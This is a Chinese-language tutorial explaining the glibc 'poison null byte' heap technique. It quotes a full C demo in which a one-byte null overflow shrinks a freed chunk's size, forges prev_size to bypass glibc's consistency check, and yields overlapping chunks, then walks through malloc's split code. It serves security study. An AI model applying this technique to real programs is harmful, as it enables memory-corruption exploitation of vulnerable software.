前言:哎呦呵,今天又能多进步一点了。
这又是一个构造的例子,重点在于一个已经 free 掉的 chunk 里面,malloc 一个小的 chunk 会发生什么,而且 free 掉一个构造的 chunk 又会有哪些之间没有接触过的检查。
让我们开始吧!
0X00 例子
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main()
{
fprintf(stderr, "Welcome to poison null byte 2.0!\n");
fprintf(stderr, "Tested in Ubuntu 14.04 64bit.\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");
uint8_t* a;
uint8_t* b;
uint8_t* c;
uint8_t* b1;
uint8_t* b2;
uint8_t* d;
void *barrier;
fprintf(stderr, "We allocate 0x100 bytes for 'a'.\n");
a = (uint8_t*) malloc(0x100);
fprintf(stderr, "a: %p\n", a);
int real_a_size = malloc_usable_size(a);
fprintf(stderr, "Since we want to overflow 'a', we need to know the 'real' size of 'a' "
"(it may be more than 0x100 because of rounding): %#x\n", real_a_size);
/* chunk size attribute cannot have a least significant byte with a value of 0x00.
* the least significant byte of this will be 0x10, because the size of the chunk includes
* the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0x200);
fprintf(stderr, "b: %p\n", b);
c = (uint8_t*) malloc(0x100);
fprintf(stderr, "c: %p\n", c);
barrier = malloc(0x100);
fprintf(stderr, "We allocate a barrier at %p, so that c is not consolidated with the top-chunk when freed.\n"
"The barrier is not strictly necessary, but makes things less confusing\n", barrier);
uint64_t* b_size_ptr = (uint64_t*)(b - 8);
// added fix for size==prev_size(next_chunk) check in newer versions of glibc
// https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30
// this added check requires we are allowed to have null pointers in b (not just a c string)
//*(size_t*)(b+0x1f0) = 0x200;
fprintf(stderr, "In newer versions of glibc we will need to have our updated size inside b itself to pass "
"the check 'chunksize(P) != prev_size (next_chunk(P))'\n");
// we set this location to 0x200 since 0x200 == (0x211 & 0xff00)
// which is the value of b.size after its first byte has been overwritten with a NULL byte
*(size_t*)(b+0x1f0) = 0x200;
// this technique works by overwriting the size metadata of a free chunk
free(b);
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "b.size is: (0x200 + 0x10) | prev_in_use\n");
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
uint64_t* c_prev_size_ptr = ((uint64_t*)c)-2;
fprintf(stderr, "c.prev_size is %#lx\n",*c_prev_size_ptr);
// This malloc will result in a call to unlink on the chunk where b was.
// The added check (commit id: 17f487b), if not properly handled as we did before,
// will detect the heap corruption now.
// The check is this: chunksize(P) != prev_size (next_chunk(P)) where
// P == b-0x10, chunksize(P) == *(b-0x10+0x8) == 0x200 (was 0x210 before the overflow)
// next_chunk(P) == b-0x10+0x200 == b+0x1f0
// prev_size (next_chunk(P)) == *(b+0x1f0) == 0x200
fprintf(stderr, "We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n",
*((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
b1 = malloc(0x100);
fprintf(stderr, "b1: %p\n",b1);
fprintf(stderr, "Now we malloc 'b1'. It will be placed where 'b' was. "
"At this point c.prev_size should have been updated, but it was not: %#lx\n",*c_prev_size_ptr);
fprintf(stderr, "Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
"before c.prev_size: %lx\n",*(((uint64_t*)c)-4));
fprintf(stderr, "We malloc 'b2', our 'victim' chunk.\n");
// Typically b2 (the victim) will be a structure with valuable pointers that we want to control
b2 = malloc(0x80);
fprintf(stderr, "b2: %p\n",b2);
memset(b2,'B',0x80);
fprintf(stderr, "Current b2 content:\n%s\n",b2);
fprintf(stderr, "Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
free(b1);
free(c);
fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2'.\n");
d = malloc(0x300);
fprintf(stderr, "d: %p\n",d);
fprintf(stderr, "Now 'd' and 'b2' overlap.\n");
memset(d,'D',0x300);
fprintf(stderr, "New b2 content:\n%s\n",b2);
fprintf(stderr, "Thanks to https://www.contextis.com/resources/white-papers/glibc-adventures-the-forgotten-chunks"
"for the clear explanation of this technique.\n");
}
0X01 手动调试并讲解原理
首先我在调试这个的时候,弄错了一个东西:「空间复用」
比如下面这个例子:
// 64 位
// gcc test.c -o test
#include <stdio.h>
#include <stdlib.h>
int main()
{
void *a = malloc(0x20);
void *b = malloc(0x20);
printf("%ld", b - a);
return 0;
}
我原来记得是,b 是高地址的 chunk。会在计算 size 的时候,把 a 的 prev_size 也算上。也就是说 b - a 相差是 0x28 但是答案是 48(0x30)。
也就是说,prev_size 没有算上。
原因是:这个 size 正好是 16 的整数倍数,如果不是 16 的整数倍就会出现空间复用的情况
free(b);
现在 unsorted bin 中有了 b 这个 chunk,并且他的下一个 chunk c 标记了前面那个 chunk 被 free 了。
这个就是 c chunk 的结构体大小为 0x110,并标记上一个 chunk b 被 free 了。
接下来就是我们这个漏洞的关键了!
a[real_a_size] = 0;
因为下一个 chunk 的 prev_size 在上一个 chunk 被使用的时候,可以被占用。所以 real_a_size 比用户请求的 size 要大。64 位大 8,32 位大 4。
在这里我们假设的是,我们可以溢出一个 Byte。且溢出的这个 Byte 为 0。这样的话,原来在这里的 size(0x210) 就被溢出为 0x200。
现在!我们如果再 malloc 一个在 b size 范围之内的 chunk 会怎么样。我们来调试:
进入 _int_malloc 中:
准备从 unsorted bin 中拿出来:
把拿出来的 chunk 放入 small bin 中:
注意!此时的 size 已经是 0x200 了。并没有什么检查,现在开始遍历所有的 bin 直到找到合适的 chunk。
*(size_t*)(b+0x1f0) = 0x200;
我在调试的时候,并没有法线什么特别的检查,并不知道这个语句有什么特别的用,直到我再仔细的读了这个注释。
// This malloc will result in a call to unlink on the chunk where b was.
// The added check (commit id: 17f487b), if not properly handled as we did before,
// will detect the heap corruption now.
// The check is this: chunksize(P) != prev_size (next_chunk(P)) where
// P == b-0x10, chunksize(P) == *(b-0x10+0x8) == 0x200 (was 0x210 before the overflow)
// next_chunk(P) == b-0x10+0x200 == b+0x1f0
// prev_size (next_chunk(P)) == *(b+0x1f0) == 0x200
知道了 chunksize(P) != prev_size (next_chunk(P)) 可能有也可能没有。所以为了保险起见我们加上:
*(size_t*)(b+0x1f0) = 0x200;
绕过这个检查。
由于我们有一个 chunk 能够保存 split 满足这次请求,所以我们的代码到了这里:
/* Split */
else
{
remainder = chunk_at_offset (victim, nb);
/* We cannot assume the unsorted list is empty and therefore
have to perform a complete insert here. */
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
{
errstr = "malloc(): corrupted unsorted chunks 2";
goto errout;
}
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;
/* advertise as last remainder */
if (in_smallbin_range (nb))
av->last_remainder = remainder;
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);
}
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
我概述一下这里做了什么:
- remainder 是当前足够大的 chunk 分配请求以后,还剩下的内存指针
- 接着 remainder 插入 unsorted bin 中
- 并且 av->last_remainder = remainder
- 最后 set_head 和 set_foot
由于 size 减少了 0x10,也就并没有修改 c 的 prev_size 的值。
现在假设我想完全控制另一个指针指的 chunk 内容,只需创建创建一个小于 remainder_size 的chunk b2,然后 free 掉 c
由于 c 的 size 没有改变,会触发向前 malloc_consolidate,把所有的之前的 chunk 合并在一起。其中就包括 b2。
如果此时 malloc() 一个较大的 chunk 就会利用这个 chunk 并且把 b2 所指向的 chunk 覆盖掉。达到控制 b2 所有的内容的目的。
0X02 总结一下
这个漏洞关键在于溢出一个 Byte 到 size 上,达到控制 size 的目的。另外一个关键在与能控制下一个 chunk 的 size,prev_chunk_inuse 位。
完结撒花。。。最后总结写得很急,因为我想睡觉了。。。
